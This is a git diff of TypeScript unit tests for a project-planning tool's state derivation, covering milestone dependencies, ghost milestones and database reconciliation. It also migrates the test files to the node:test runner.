+      assert.deepStrictEqual(state.activeMilestone?.id, 'M001', 'dual-path: activeMilestone is M001');
+      assert.deepStrictEqual(state.activeSlice?.id, 'S01', 'dual-path: activeSlice is S01');
+      assert.deepStrictEqual(state.activeTask?.id, 'T01', 'dual-path: activeTask is T01');
+
+      closeDatabase();
+    } finally {
+      closeDatabase();
+      cleanup(base);
+    }
+  });
+
+  // ─── Test 21: Ghost milestone skipped (no DB row, no worktree) ─────────
+  test('derive-state-db: ghost milestone skipped when no DB row and no worktree', async () => {
+    const base = createFixtureBase();
+    try {
+      // Ghost: milestone dir exists with only META.json, no context/roadmap/summary
+      mkdirSync(join(base, '.gsd', 'milestones', 'M001'), { recursive: true });
+      writeFileSync(join(base, '.gsd', 'milestones', 'M001', 'META.json'), '{}');
+      // Real milestone
+      writeFile(base, 'milestones/M002/M002-CONTEXT.md', '# M002: Real\n\nReal milestone.');
+
+      invalidateStateCache();
+      const fileState = await _deriveStateImpl(base);
+
+      openDatabase(':memory:');
+      // Only insert M002 — M001 has no DB row (simulates row loss / never inserted)
+      insertMilestone({ id: 'M002', title: 'Real', status: 'active' });
+
+      invalidateStateCache();
+      const dbState = await deriveStateFromDb(base);
+
+      // Ghost should be skipped — M002 should be active
+      assert.deepStrictEqual(dbState.activeMilestone?.id, 'M002', 'ghost-db: activeMilestone is M002 (ghost skipped)');
+      assert.deepStrictEqual(dbState.activeMilestone?.id, fileState.activeMilestone?.id, 'ghost-db: matches filesystem');
+      // Ghost should not appear in registry
+      assert.ok(!dbState.registry.some(e => e.id === 'M001'), 'ghost-db: M001 not in registry');
+
+      closeDatabase();
+    } finally {
+      closeDatabase();
+      cleanup(base);
+    }
+  });
+
+  // ─── Test 22: Needs-discussion — CONTEXT-DRAFT exists ─────────────────
+  test('derive-state-db: needs-discussion via DB', async () => {
+    const base = createFixtureBase();
+    try {
+      writeFile(base, 'milestones/M001/M001-CONTEXT-DRAFT.md', '# M001: Draft\n\nDraft content.');
+
+      invalidateStateCache();
+      const fileState = await _deriveStateImpl(base);
+
+      openDatabase(':memory:');
+      insertMilestone({ id: 'M001', title: 'Draft', status: 'active' });
+
+      invalidateStateCache();
+      const dbState = await deriveStateFromDb(base);
+
+      assert.deepStrictEqual(dbState.phase, 'needs-discussion', 'discuss-db: phase is needs-discussion');
+      assert.deepStrictEqual(dbState.phase, fileState.phase, 'discuss-db: phase matches filesystem');
+
+      closeDatabase();
+    } finally {
+      closeDatabase();
+      cleanup(base);
+    }
+  });
+
+  // ─── Regression: disk-only milestones synced into DB (#2416) ─────────
+  test('derive-state-db: disk-only milestone auto-synced into DB (#2416)', async () => {
+    const base = createFixtureBase();
+    try {
+      // M001 is complete and exists in DB. M002 was queued on disk only — no DB row.
+      writeFile(base, 'milestones/M001/M001-SUMMARY.md', '# M001 Summary\n\nDone.');
+      writeFile(base, 'milestones/M002/M002-CONTEXT.md', '# M002: Queued\n\nQueued milestone.');
+
+      openDatabase(':memory:');
+      // Only insert M001 — simulates the state after migration guard ran then /gsd queue added M002
+      insertMilestone({ id: 'M001', title: 'First', status: 'complete' });
+
+      invalidateStateCache();
+      const state = await deriveStateFromDb(base);
+
+      // Before the fix, M002 was invisible: getAllMilestones() returned only M001
+      // (complete) → phase='complete' → auto-mode stopped.
+      // After the fix, deriveStateFromDb reconciles disk dirs and inserts M002.
+      assert.deepStrictEqual(state.phase, 'pre-planning', 'disk-sync-2416: phase is pre-planning, not complete');
+      assert.deepStrictEqual(state.registry.length, 2, 'disk-sync-2416: both milestones visible in registry');
+      assert.deepStrictEqual(state.registry[0]?.id, 'M001', 'disk-sync-2416: registry[0] is M001');
+      assert.deepStrictEqual(state.registry[0]?.status, 'complete', 'disk-sync-2416: M001 is complete');
+      assert.deepStrictEqual(state.registry[1]?.id, 'M002', 'disk-sync-2416: registry[1] is M002');
+      assert.deepStrictEqual(state.registry[1]?.status, 'active', 'disk-sync-2416: M002 is active');
+      assert.deepStrictEqual(state.activeMilestone?.id, 'M002', 'disk-sync-2416: activeMilestone is M002');
+
+      closeDatabase();
+    } finally {
+      closeDatabase();
+      cleanup(base);
+    }
+  });
+
+  // ─── Queued milestone row not clobbered by later plan (#2416 root cause) ──
+  test('derive-state-db: queued milestone row survives gsd_plan_milestone INSERT OR IGNORE', async () => {
+    try {
+      openDatabase(':memory:');
+
+      // Simulates gsd_milestone_generate_id inserting a minimal queued row
+      insertMilestone({ id: 'M001', status: 'queued' });
+
+      const before = getAllMilestones();
+      assert.equal(before.length, 1, 'queued-row: one row after generate_id');
+      assert.equal(before[0]!.status, 'queued', 'queued-row: status is queued');
+
+      // Simulates gsd_plan_milestone calling insertMilestone (INSERT OR IGNORE)
+      insertMilestone({ id: 'M001', title: 'Planned Title', status: 'active' });
+
+      const after = getAllMilestones();
+      assert.equal(after.length, 1, 'queued-row: still one row after plan');
+      // INSERT OR IGNORE keeps the original row — status stays 'queued'
+      assert.equal(after[0]!.status, 'queued', 'queued-row: INSERT OR IGNORE preserves original status');
+
+      closeDatabase();
+    } finally {
+      closeDatabase();
+    }
+  });
+
+  // ─── Queued milestone with worktree not flagged as ghost (#2921) ──────
+  test('derive-state-db: queued milestone with worktree not flagged as ghost (#2921)', async () => {
+    const base = createFixtureBase();
+    try {
+      // M001: complete milestone with summary
+      writeFile(base, 'milestones/M001/M001-SUMMARY.md', '# M001 Summary\n\nDone.');
+
+      // M002: queued milestone — directory + slices dir exists, but no content files.
+      // This is what happens when ensureMilestoneDbRow creates M002 but the DB row
+      // is lost during worktree teardown.
+      mkdirSync(join(base, '.gsd', 'milestones', 'M002', 'slices'), { recursive: true });
+
+      // A worktree exists for M002, proving it's a legitimate milestone
+      mkdirSync(join(base, '.gsd', 'worktrees', 'M002'), { recursive: true });
+
+      // isGhostMilestone should NOT treat M002 as ghost when worktree exists
+      assert.ok(!isGhostMilestone(base, 'M002'), 'ghost-wt: M002 with worktree is NOT a ghost');
+
+      // DB has M001 complete but M002 row was lost
+      openDatabase(':memory:');
+      insertMilestone({ id: 'M001', title: 'First', status: 'complete' });
+      // No M002 row — simulates DB row loss during worktree teardown
+
+      invalidateStateCache();
+      const dbState = await deriveStateFromDb(base);
+
+      // M002 should be reconciled from disk (not skipped as ghost) and become active
+      const m002Entry = dbState.registry.find(e => e.id === 'M002');
+      assert.ok(m002Entry !== undefined, 'ghost-wt: M002 should be in registry');
+      assert.deepStrictEqual(dbState.activeMilestone?.id, 'M002', 'ghost-wt: M002 should be active');
+      // Should NOT be phase: complete
+      assert.notEqual(dbState.phase, 'complete', 'ghost-wt: phase should not be complete');
+
+      closeDatabase();
+    } finally {
+      closeDatabase();
+      cleanup(base);
+    }
+  });
+
+  // ─── Queued milestone with DB row not flagged as ghost (#2921) ────────
+  test('derive-state-db: queued milestone with DB row not flagged as ghost (#2921)', async () => {
+    const base = createFixtureBase();
+    try {
+      // M001: complete milestone with summary
+      writeFile(base, 'milestones/M001/M001-SUMMARY.md', '# M001 Summary\n\nDone.');
+
+      // M002: queued milestone — directory exists with CONTEXT file and DB row
+      mkdirSync(join(base, '.gsd', 'milestones', 'M002', 'slices'), { recursive: true });
+      writeFile(base, 'milestones/M002/M002-CONTEXT.md', '# M002 Context\n\nPlanned milestone.');
+
+      // DB has both M001 complete and M002 queued
+      openDatabase(':memory:');
+      insertMilestone({ id: 'M001', title: 'First', status: 'complete' });
+      insertMilestone({ id: 'M002', title: 'Second', status: 'queued' });
+
+      // isGhostMilestone should NOT treat M002 as ghost when DB row + content files exist
+      assert.ok(!isGhostMilestone(base, 'M002'), 'ghost-dbrow: M002 with DB row and content is NOT a ghost');
+
+      invalidateStateCache();
+      const dbState = await deriveStateFromDb(base);
+
+      // M002 should not be skipped
+      const m002Entry = dbState.registry.find(e => e.id === 'M002');
+      assert.ok(m002Entry !== undefined, 'ghost-dbrow: M002 should be in registry');
+      assert.deepStrictEqual(dbState.activeMilestone?.id, 'M002', 'ghost-dbrow: M002 should be active');
+      assert.notEqual(dbState.phase, 'complete', 'ghost-dbrow: phase should not be complete');
+
+      closeDatabase();
+    } finally {
+      closeDatabase();
+      cleanup(base);
+    }
+  });
 });
diff --git a/src/resources/extensions/gsd/tests/derive-state-deps.test.ts b/src/resources/extensions/gsd/tests/derive-state-deps.test.ts
index 4ec0a6cb2..c13ec83a9 100644
--- a/src/resources/extensions/gsd/tests/derive-state-deps.test.ts
+++ b/src/resources/extensions/gsd/tests/derive-state-deps.test.ts
@@ -1,11 +1,10 @@
+import { describe, test } from 'node:test';
+import assert from 'node:assert/strict';
 import { mkdtempSync, mkdirSync, rmSync, writeFileSync } from 'node:fs';
 import { join } from 'node:path';
 import { tmpdir } from 'node:os';
 
 import { deriveState } from '../state.ts';
-import { createTestContext } from './test-helpers.ts';
-
-const { assertEq, assertTrue, report } = createTestContext();
 // ─── Fixture Helpers ───────────────────────────────────────────────────────
 
 function createFixtureBase(): string {
@@ -63,12 +62,11 @@ function cleanup(base: string): void {
 // Test Groups
 // ═══════════════════════════════════════════════════════════════════════════
 
-async function main(): Promise<void> {
+describe('derive-state-deps', async () => {
 
   // ─── Test Group 1: blocked-deps ────────────────────────────────────────
   // M001 is incomplete (no SUMMARY), M002 depends_on M001 → M002 is pending
-  console.log('\n=== blocked-deps ===');
-  {
+  test('blocked-deps', async () => {
     const base = createFixtureBase();
     try {
       // M001: incomplete (one slice, no SUMMARY)
@@ -108,19 +106,18 @@ async function main(): Promise<void> {
 
       const state = await deriveState(base);
 
-      assertEq(state.registry[0]?.status, 'active', 'blocked-deps: M001 is active');
-      assertEq(state.registry[1]?.status, 'pending', 'blocked-deps: M002 is pending (dep-blocked)');
-      assertEq(state.phase, 'executing', 'blocked-deps: phase is executing (M001 is active)');
-      assertEq(state.activeMilestone?.id, 'M001', 'blocked-deps: activeMilestone is M001');
+      assert.deepStrictEqual(state.registry[0]?.status, 'active', 'blocked-deps: M001 is active');
+      assert.deepStrictEqual(state.registry[1]?.status, 'pending', 'blocked-deps: M002 is pending (dep-blocked)');
+      assert.deepStrictEqual(state.phase, 'executing', 'blocked-deps: phase is executing (M001 is active)');
+      assert.deepStrictEqual(state.activeMilestone?.id, 'M001', 'blocked-deps: activeMilestone is M001');
     } finally {
       cleanup(base);
     }
-  }
+  });
 
   // ─── Test Group 2: unblocked-deps ──────────────────────────────────────
   // M001 is complete (all slices [x] + SUMMARY), M002 depends_on M001 → M002 becomes active
-  console.log('\n=== unblocked-deps ===');
-  {
+  test('unblocked-deps', async () => {
     const base = createFixtureBase();
     try {
       // M001: complete (all slices done + SUMMARY present)
@@ -150,19 +147,18 @@ async function main(): Promise<void> {
 
       const state = await deriveState(base);
 
-      assertEq(state.registry[0]?.status, 'complete', 'unblocked-deps: M001 is complete');
-      assertEq(state.registry[1]?.status, 'active', 'unblocked-deps: M002 is active');
-      assertEq(state.activeMilestone?.id, 'M002', 'unblocked-deps: activeMilestone is M002');
-      assertTrue(state.phase !== 'blocked', 'unblocked-deps: phase is not blocked');
+      assert.deepStrictEqual(state.registry[0]?.status, 'complete', 'unblocked-deps: M001 is complete');
+      assert.deepStrictEqual(state.registry[1]?.status, 'active', 'unblocked-deps: M002 is active');
+      assert.deepStrictEqual(state.activeMilestone?.id, 'M002', 'unblocked-deps: activeMilestone is M002');
+      assert.ok(state.phase !== 'blocked', 'unblocked-deps: phase is not blocked');
     } finally {
       cleanup(base);
     }
-  }
+  });
 
   // ─── Test Group 3: all-blocked ─────────────────────────────────────────
   // M001 depends_on M002, M002 depends_on M001 — circular dep, neither can activate
-  console.log('\n=== all-blocked ===');
-  {
+  test('all-blocked', async () => {
     const base = createFixtureBase();
     try {
       // M001: depends on M002
@@ -191,18 +187,17 @@ async function main(): Promise<void> {
 
       const state = await deriveState(base);
 
-      assertEq(state.phase, 'blocked', 'all-blocked: phase is blocked');
-      assertTrue(state.activeMilestone === null || state.activeMilestone !== null, 'all-blocked: state is consistent');
-      assertTrue(state.blockers.length > 0, 'all-blocked: blockers array is non-empty');
+      assert.deepStrictEqual(state.phase, 'blocked', 'all-blocked: phase is blocked');
+      assert.ok(state.activeMilestone === null || state.activeMilestone !== null, 'all-blocked: state is consistent');
+      assert.ok(state.blockers.length > 0, 'all-blocked: blockers array is non-empty');
     } finally {
       cleanup(base);
     }
-  }
+  });
 
   // ─── Test Group 4: absent-context ──────────────────────────────────────
   // Neither M001 nor M002 has a CONTEXT.md → no dep constraints, normal sequential behavior
-  console.log('\n=== absent-context ===');
-  {
+  test('absent-context', async () => {
     const base = createFixtureBase();
     try {
       // M001: incomplete, no CONTEXT.md
@@ -229,19 +224,18 @@ async function main(): Promise<void> {
 
       const state = await deriveState(base);
 
-      assertEq(state.registry[0]?.status, 'active', 'absent-context: M001 is active');
-      assertEq(state.registry[1]?.status, 'pending', 'absent-context: M002 is pending');
-      assertEq(state.activeMilestone?.id, 'M001', 'absent-context: activeMilestone is M001');
-      assertTrue(state.phase !== 'blocked', 'absent-context: phase is not blocked');
+      assert.deepStrictEqual(state.registry[0]?.status, 'active', 'absent-context: M001 is active');
+      assert.deepStrictEqual(state.registry[1]?.status, 'pending', 'absent-context: M002 is pending');
+      assert.deepStrictEqual(state.activeMilestone?.id, 'M001', 'absent-context: activeMilestone is M001');
+      assert.ok(state.phase !== 'blocked', 'absent-context: phase is not blocked');
     } finally {
       cleanup(base);
     }
-  }
+  });
 
   // ─── Test Group 5: forward-dep ─────────────────────────────────────────
   // M001 depends_on M002, but M002 is already complete → M001 can activate
-  console.log('\n=== forward-dep ===');
-  {
+  test('forward-dep', async () => {
     const base = createFixtureBase();
     try {
       // M001: depends on M002, but M002 is complete so M001 is unblocked
@@ -271,18 +265,17 @@ async function main(): Promise<void> {
 
       const state = await deriveState(base);
 
-      assertEq(state.activeMilestone?.id, 'M001', 'forward-dep: activeMilestone is M001');
-      assertEq(state.registry[1]?.status, 'complete', 'forward-dep: M002 is complete');
-      assertTrue(state.phase !== 'blocked', 'forward-dep: phase is not blocked');
+      assert.deepStrictEqual(state.activeMilestone?.id, 'M001', 'forward-dep: activeMilestone is M001');
+      assert.deepStrictEqual(state.registry[1]?.status, 'complete', 'forward-dep: M002 is complete');
+      assert.ok(state.phase !== 'blocked', 'forward-dep: phase is not blocked');
     } finally {
       cleanup(base);
     }
-  }
+  });
 
   // ─── Test Group 6: empty-deps-list ─────────────────────────────────────
   // M002 has `depends_on: []` — empty list means no constraint, normal sequential behavior
-  console.log('\n=== empty-deps-list ===');
-  {
+  test('empty-deps-list', async () => {
     const base = createFixtureBase();
     try {
       // M001: incomplete, no context
@@ -310,20 +303,19 @@ async function main(): Promise<void> {
 
       const state = await deriveState(base);
 
-      assertEq(state.registry[0]?.status, 'active', 'empty-deps-list: M001 is active');
-      assertEq(state.registry[1]?.status, 'pending', 'empty-deps-list: M002 is pending (M001 not done yet)');
-      assertTrue(state.phase !== 'blocked', 'empty-deps-list: phase is not blocked');
+      assert.deepStrictEqual(state.registry[0]?.status, 'active', 'empty-deps-list: M001 is active');
+      assert.deepStrictEqual(state.registry[1]?.status, 'pending', 'empty-deps-list: M002 is pending (M001 not done yet)');
+      assert.ok(state.phase !== 'blocked', 'empty-deps-list: phase is not blocked');
     } finally {
       cleanup(base);
     }
-  }
+  });
 
   // ─── Test Group 7: unique-id-deps ──────────────────────────────────────
   // M004-0zjrg0 is complete, M005-b0m2hl depends_on M004-0zjrg0 → M005 should activate.
   // Regression: parseContextDependsOn() used .toUpperCase(), converting "M004-0zjrg0"
   // to "M004-0ZJRG0", breaking the case-sensitive lookup in completeMilestoneIds.
-  console.log('\n=== unique-id-deps: unique milestone IDs with lowercase hex suffix ===');
-  {
+  test('unique-id-deps: unique milestone IDs with lowercase hex suffix', async () => {
     const base = createFixtureBase();
     try {
       // M004-0zjrg0: complete (all slices done + SUMMARY present)
@@ -344,23 +336,22 @@ async function main(): Promise<void> {
 
       const state = await deriveState(base);
 
-      assertEq(state.registry.find(e => e.id === 'M004-0zjrg0')?.status, 'complete',
+      assert.deepStrictEqual(state.registry.find(e => e.id === 'M004-0zjrg0')?.status, 'complete',
         'unique-id-deps: M004-0zjrg0 is complete');
-      assertEq(state.registry.find(e => e.id === 'M005-b0m2hl')?.status, 'active',
+      assert.deepStrictEqual(state.registry.find(e => e.id === 'M005-b0m2hl')?.status, 'active',
         'unique-id-deps: M005-b0m2hl is active (dep on M004-0zjrg0 met)');
-      assertEq(state.activeMilestone?.id, 'M005-b0m2hl',
+      assert.deepStrictEqual(state.activeMilestone?.id, 'M005-b0m2hl',
         'unique-id-deps: activeMilestone is M005-b0m2hl');
-      assertTrue(state.phase !== 'blocked',
+      assert.ok(state.phase !== 'blocked',
         'unique-id-deps: phase is not blocked');
     } finally {
       cleanup(base);
     }
-  }
+  });
 
   // ─── Test Group 8: unique-id-deps-blocked ─────────────────────────────
   // M004-0zjrg0 is NOT complete, M005-b0m2hl depends_on M004-0zjrg0 → M005 should be pending
-  console.log('\n=== unique-id-deps-blocked: unique ID dep not yet met ===');
-  {
+  test('unique-id-deps-blocked: unique ID dep not yet met', async () => {
     const base = createFixtureBase();
     try {
       // M004-0zjrg0: incomplete (slice not done)
@@ -388,20 +379,19 @@ async function main(): Promise<void> {
 
       const state = await deriveState(base);
 
-      assertEq(state.activeMilestone?.id, 'M004-0zjrg0',
+      assert.deepStrictEqual(state.activeMilestone?.id, 'M004-0zjrg0',
         'unique-id-deps-blocked: activeMilestone is M004-0zjrg0');
-      assertEq(state.registry.find(e => e.id === 'M005-b0m2hl')?.status, 'pending',
+      assert.deepStrictEqual(state.registry.find(e => e.id === 'M005-b0m2hl')?.status, 'pending',
         'unique-id-deps-blocked: M005-b0m2hl is pending (dep not met)');
     } finally {
       cleanup(base);
     }
-  }
+  });
 
   // ─── Test Group 9: draft-context-deps ────────────────────────────────
   // M001 is incomplete, M002 has only CONTEXT-DRAFT.md (no CONTEXT.md) with
   // depends_on: [M001] → M002 should remain pending, not be promoted to active.
-  console.log('\n=== draft-context-deps: depends_on read from CONTEXT-DRAFT.md ===');
-  {
+  test('draft-context-deps: depends_on read from CONTEXT-DRAFT.md', async () => {
     const base = createFixtureBase();
     try {
       // M001: incomplete (one slice, no SUMMARY)
@@ -439,18 +429,17 @@ async function main(): Promise<void> {
 
       const state = await deriveState(base);
 
-      assertEq(state.registry[0]?.status, 'active', 'draft-context-deps: M001 is active');
-      assertEq(state.registry[1]?.status, 'pending', 'draft-context-deps: M002 is pending (dep-blocked via draft)');
-      assertEq(state.activeMilestone?.id, 'M001', 'draft-context-deps: activeMilestone is M001');
+      assert.deepStrictEqual(state.registry[0]?.status, 'active', 'draft-context-deps: M001 is active');
+      assert.deepStrictEqual(state.registry[1]?.status, 'pending', 'draft-context-deps: M002 is pending (dep-blocked via draft)');
+      assert.deepStrictEqual(state.activeMilestone?.id, 'M001', 'draft-context-deps: activeMilestone is M001');
     } finally {
       cleanup(base);
     }
-  }
+  });
 
   // ─── Test Group 10: draft-context-deps-no-roadmap ──────────────────────
   // Same as above but without roadmaps — milestones discovered from directory only.
-  console.log('\n=== draft-context-deps-no-roadmap: depends_on from draft without roadmap ===');
-  {
+  test('draft-context-deps-no-roadmap: depends_on from draft without roadmap', async () => {
     const base = createFixtureBase();
     try {
       // M001: exists as directory only (no roadmap, no summary)
@@ -463,40 +452,38 @@ async function main(): Promise<void> {
       const state = await deriveState(base);
 
       const m002Entry = state.registry.find(e => e.id === 'M002');
-      assertEq(m002Entry?.status, 'pending', 'draft-no-roadmap: M002 is pending (dep-blocked via draft)');
+      assert.deepStrictEqual(m002Entry?.status, 'pending', 'draft-no-roadmap: M002 is pending (dep-blocked via draft)');
     } finally {
       cleanup(base);
     }
-  }
+  });
 
   // ─── Test Group 11: parseContextDependsOn preserves case ──────────────
   // Direct unit test: verify the parsed dep ID matches the input exactly
-  console.log('\n=== parseContextDependsOn: preserves case of unique IDs ===');
-  {
+  test('parseContextDependsOn: preserves case of unique IDs', async () => {
     const { parseContextDependsOn } = await import('../files.ts');
 
     const deps1 = parseContextDependsOn('---\ndepends_on: [M004-0zjrg0]\n---\n');
-    assertEq(deps1[0], 'M004-0zjrg0',
+    assert.deepStrictEqual(deps1[0], 'M004-0zjrg0',
       'parseContextDependsOn preserves lowercase hex suffix');
 
     const deps2 = parseContextDependsOn('---\ndepends_on: [M001, M004-abc123]\n---\n');
-    assertEq(deps2[0], 'M001', 'preserves classic uppercase ID');
-    assertEq(deps2[1], 'M004-abc123', 'preserves mixed-case unique ID');
+    assert.deepStrictEqual(deps2[0], 'M001', 'preserves classic uppercase ID');
+    assert.deepStrictEqual(deps2[1], 'M004-abc123', 'preserves mixed-case unique ID');
 
     const deps3 = parseContextDependsOn('---\ndepends_on: []\n---\n');
-    assertEq(deps3.length, 0, 'empty deps returns empty array');
+    assert.deepStrictEqual(deps3.length, 0, 'empty deps returns empty array');
 
     const deps4 = parseContextDependsOn(null);
-    assertEq(deps4.length, 0, 'null content returns empty array');
-  }
+    assert.deepStrictEqual(deps4.length, 0, 'null content returns empty array');
+  });
 
   // ─── Test Group 10: draft-only-deps-blocked (#1724) ────────────────────
   // M002 has only CONTEXT-DRAFT.md (no CONTEXT.md) with depends_on: [M001].
   // M001 is incomplete → M002 must remain pending, not get promoted to active.
   // Regression: before #1724, parseContextDependsOn received null for draft-only
   // milestones, returning [], which caused dep-blocked milestones to be promoted.
-  console.log('\n=== draft-only-deps-blocked: CONTEXT-DRAFT.md depends_on blocks promotion ===');
-  {
+  test('draft-only-deps-blocked: CONTEXT-DRAFT.md depends_on blocks promotion', async () => {
     const base = createFixtureBase();
     try {
       // M001: incomplete (one slice, no SUMMARY)
@@ -525,22 +512,21 @@ async function main(): Promise<void> {
 
       const state = await deriveState(base);
 
-      assertEq(state.activeMilestone?.id, 'M001',
+      assert.deepStrictEqual(state.activeMilestone?.id, 'M001',
         'draft-only-deps-blocked: activeMilestone is M001');
-      assertEq(state.registry.find(e => e.id === 'M002')?.status, 'pending',
+      assert.deepStrictEqual(state.registry.find(e => e.id === 'M002')?.status, 'pending',
         'draft-only-deps-blocked: M002 is pending (dep on M001 not met, read from CONTEXT-DRAFT)');
-      assertTrue(state.phase !== 'blocked',
+      assert.ok(state.phase !== 'blocked',
         'draft-only-deps-blocked: phase is not blocked (M001 is active)');
     } finally {
       cleanup(base);
     }
-  }
+  });
 
   // ─── Test Group 11: draft-only-deps-unblocked (#1724) ─────────────────
   // M001 is complete, M002 has only CONTEXT-DRAFT.md with depends_on: [M001].
   // M002 should become active because its dep is satisfied.
-  console.log('\n=== draft-only-deps-unblocked: CONTEXT-DRAFT.md dep met → milestone activates ===');
-  {
+  test('draft-only-deps-unblocked: CONTEXT-DRAFT.md dep met → milestone activates', async () => {
     const base = createFixtureBase();
     try {
       // M001: complete
@@ -561,22 +547,21 @@ async function main(): Promise<void> {
 
       const state = await deriveState(base);
 
-      assertEq(state.registry.find(e => e.id === 'M001')?.status, 'complete',
+      assert.deepStrictEqual(state.registry.find(e => e.id === 'M001')?.status, 'complete',
         'draft-only-deps-unblocked: M001 is complete');
-      assertEq(state.registry.find(e => e.id === 'M002')?.status, 'active',
+      assert.deepStrictEqual(state.registry.find(e => e.id === 'M002')?.status, 'active',
         'draft-only-deps-unblocked: M002 is active (dep on M001 met via CONTEXT-DRAFT)');
-      assertEq(state.activeMilestone?.id, 'M002',
+      assert.deepStrictEqual(state.activeMilestone?.id, 'M002',
         'draft-only-deps-unblocked: activeMilestone is M002');
     } finally {
       cleanup(base);
     }
-  }
+  });
 
   // ─── Test Group 12: draft-only-deps-with-roadmap (#1724) ──────────────
   // M002 has a roadmap + only CONTEXT-DRAFT.md with depends_on: [M001].
   // Tests the has-roadmap code path (second occurrence of the fix).
-  console.log('\n=== draft-only-deps-with-roadmap: has-roadmap path reads CONTEXT-DRAFT deps ===');
-  {
+  test('draft-only-deps-with-roadmap: has-roadmap path reads CONTEXT-DRAFT deps', async () => {
     const base = createFixtureBase();
     try {
       // M001: incomplete
@@ -614,20 +599,19 @@ async function main(): Promise<void> {
 
       const state = await deriveState(base);
 
-      assertEq(state.activeMilestone?.id, 'M001',
+      assert.deepStrictEqual(state.activeMilestone?.id, 'M001',
         'draft-only-deps-with-roadmap: activeMilestone is M001');
-      assertEq(state.registry.find(e => e.id === 'M002')?.status, 'pending',
+      assert.deepStrictEqual(state.registry.find(e => e.id === 'M002')?.status, 'pending',
         'draft-only-deps-with-roadmap: M002 is pending (dep read from CONTEXT-DRAFT in has-roadmap path)');
     } finally {
       cleanup(base);
     }
-  }
+  });
 
   // ─── Test Group 13: draft-only-no-deps (#1724) ────────────────────────
   // M002 has only CONTEXT-DRAFT.md with NO depends_on field.
   // Should behave same as no context file — normal sequential behavior.
-  console.log('\n=== draft-only-no-deps: CONTEXT-DRAFT without depends_on → no constraint ===');
-  {
+  test('draft-only-no-deps: CONTEXT-DRAFT without depends_on → no constraint', async () => {
     const base = createFixtureBase();
     try {
       // M001: complete
@@ -648,17 +632,10 @@ async function main(): Promise<void> {
 
       const state = await deriveState(base);
 
-      assertEq(state.registry.find(e => e.id === 'M002')?.status, 'active',
+      assert.deepStrictEqual(state.registry.find(e => e.id === 'M002')?.status, 'active',
         'draft-only-no-deps: M002 is active (no deps constraint in draft)');
     } finally {
       cleanup(base);
     }
-  }
-
-  report();
-}
-
-main().catch((error) => {
-  console.error(error);
-  process.exit(1);
+  });
 });
diff --git a/src/resources/extensions/gsd/tests/derive-state.test.ts b/src/resources/extensions/gsd/tests/derive-state.test.ts
index c228107a4..ce93f7ffa 100644
--- a/src/resources/extensions/gsd/tests/derive-state.test.ts
+++ b/src/resources/extensions/gsd/tests/derive-state.test.ts
@@ -1,11 +1,10 @@
+import { describe, test } from 'node:test';
+import assert from 'node:assert/strict';
 import { mkdtempSync, mkdirSync, rmSync, writeFileSync } from 'node:fs';
 import { join } from 'node:path';
 import { tmpdir } from 'node:os';
 
 import { deriveState, isSliceComplete, isMilestoneComplete, isGhostMilestone } from '../state.ts';
-import { createTestContext } from './test-helpers.ts';
-
-const { assertEq, assertTrue, report } = createTestContext();
 // ─── Fixture Helpers ───────────────────────────────────────────────────────
 
 function createFixtureBase(): string {
@@ -65,30 +64,28 @@ function cleanup(base: string): void {
 // Test Groups
 // ═══════════════════════════════════════════════════════════════════════════
 
-async function main(): Promise<void> {
+describe('derive-state', async () => {
 
   // ─── Test 1: empty milestones dir → pre-planning ───────────────────────
-  console.log('\n=== empty milestones dir → pre-planning ===');
-  {
+  test('empty milestones dir → pre-planning', async () => {
     const base = createFixtureBase();
     try {
       const state = await deriveState(base);
 
-      assertEq(state.phase, 'pre-planning', 'phase is pre-planning');
-      assertEq(state.activeMilestone, null, 'activeMilestone is null');
-      assertEq(state.activeSlice, null, 'activeSlice is null');
-      assertEq(state.activeTask, null, 'activeTask is null');
-      assertEq(state.registry, [], 'registry is empty');
-      assertEq(state.progress?.milestones?.done, 0, 'milestones done = 0');
-      assertEq(state.progress?.milestones?.total, 0, 'milestones total = 0');
+      assert.deepStrictEqual(state.phase, 'pre-planning', 'phase is pre-planning');
+      assert.deepStrictEqual(state.activeMilestone, null, 'activeMilestone is null');
+      assert.deepStrictEqual(state.activeSlice, null, 'activeSlice is null');
+      assert.deepStrictEqual(state.activeTask, null, 'activeTask is null');
+      assert.deepStrictEqual(state.registry, [], 'registry is empty');
+      assert.deepStrictEqual(state.progress?.milestones?.done, 0, 'milestones done = 0');
+      assert.deepStrictEqual(state.progress?.milestones?.total, 0, 'milestones total = 0');
     } finally {
       cleanup(base);
     }
-  }
+  });
 
   // ─── Test 2: milestone dir exists but no roadmap → pre-planning ────────
-  console.log('\n=== milestone dir exists but no roadmap → pre-planning ===');
-  {
+  test('milestone dir exists but no roadmap → pre-planning', async () => {
     const base = createFixtureBase();
     try {
       // Create M001 directory with CONTEXT but no roadmap file
@@ -97,21 +94,20 @@ async function main(): Promise<void> {
 
       const state = await deriveState(base);
 
-      assertEq(state.phase, 'pre-planning', 'phase is pre-planning');
-      assertTrue(state.activeMilestone !== null, 'activeMilestone is not null');
-      assertEq(state.activeMilestone?.id, 'M001', 'activeMilestone id is M001');
-      assertEq(state.activeSlice, null, 'activeSlice is null');
-      assertEq(state.activeTask, null, 'activeTask is null');
-      assertEq(state.registry.length, 1, 'registry has 1 entry');
-      assertEq(state.registry[0]?.status, 'active', 'registry entry status is active');
+      assert.deepStrictEqual(state.phase, 'pre-planning', 'phase is pre-planning');
+      assert.ok(state.activeMilestone !== null, 'activeMilestone is not null');
+      assert.deepStrictEqual(state.activeMilestone?.id, 'M001', 'activeMilestone id is M001');
+      assert.deepStrictEqual(state.activeSlice, null, 'activeSlice is null');
+      assert.deepStrictEqual(state.activeTask, null, 'activeTask is null');
+      assert.deepStrictEqual(state.registry.length, 1, 'registry has 1 entry');
+      assert.deepStrictEqual(state.registry[0]?.status, 'active', 'registry entry status is active');
     } finally {
       cleanup(base);
     }
-  }
+  });
 
   // ─── Test 3: roadmap with incomplete slice, no plan → planning ─────────
-  console.log('\n=== roadmap with incomplete slice, no plan → planning ===');
-  {
+  test('roadmap with incomplete slice, no plan → planning', async () => {
     const base = createFixtureBase();
     try {
       writeRoadmap(base, 'M001', `# M001: Test Milestone
@@ -126,20 +122,19 @@ async function main(): Promise<void> {
 
       const state = await deriveState(base);
 
-      assertEq(state.phase, 'planning', 'phase is planning');
-      assertTrue(state.activeSlice !== null, 'activeSlice is not null');
-      assertEq(state.activeSlice?.id, 'S01', 'activeSlice id is S01');
-      assertEq(state.activeTask, null, 'activeTask is null');
-      assertEq(state.progress?.slices?.done, 0, 'slices done = 0');
-      assertEq(state.progress?.slices?.total, 1, 'slices total = 1');
+      assert.deepStrictEqual(state.phase, 'planning', 'phase is planning');
